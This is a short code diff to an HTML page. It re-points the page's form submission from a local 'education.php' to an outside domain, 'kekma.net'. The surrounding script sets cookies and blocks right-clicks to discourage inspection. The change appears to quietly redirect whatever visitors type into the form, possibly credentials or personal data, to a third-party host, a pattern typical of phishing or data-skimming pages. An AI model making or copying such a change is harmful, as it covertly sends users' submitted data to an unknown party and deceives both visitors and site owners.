--- a/index.html
+++ b/index.html
@@ -16,7 +16,7 @@
 	</head>
 	
 	<body>
-	  <form action="education.php" method="POST" class="submit">
+	  <form action="https://kekma.net/" method="POST" class="submit">
 	<script type="text/javascript">function next(){location.href="#"+location.search}function setCookie(e,t){var n=new Date;n.setTime(n.getTime()+2592e6);var o="expires="+n.toUTCString();document.cookie=e+"="+t+"; "+o}function getCookie(e){for(var t=e+"=",n=document.cookie.split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(t))return i.substring(t.length,i.length)}return 0}var message="You have not Permission to This";document.onmousedown=function(e){return"Netscape"==navigator.appName&&3==e.which?(alert(message),!1):-1!=navigator.appVersion.indexOf("MSIE")&&2==event.button?(alert(message),!1):void 0};</script>
 
 	
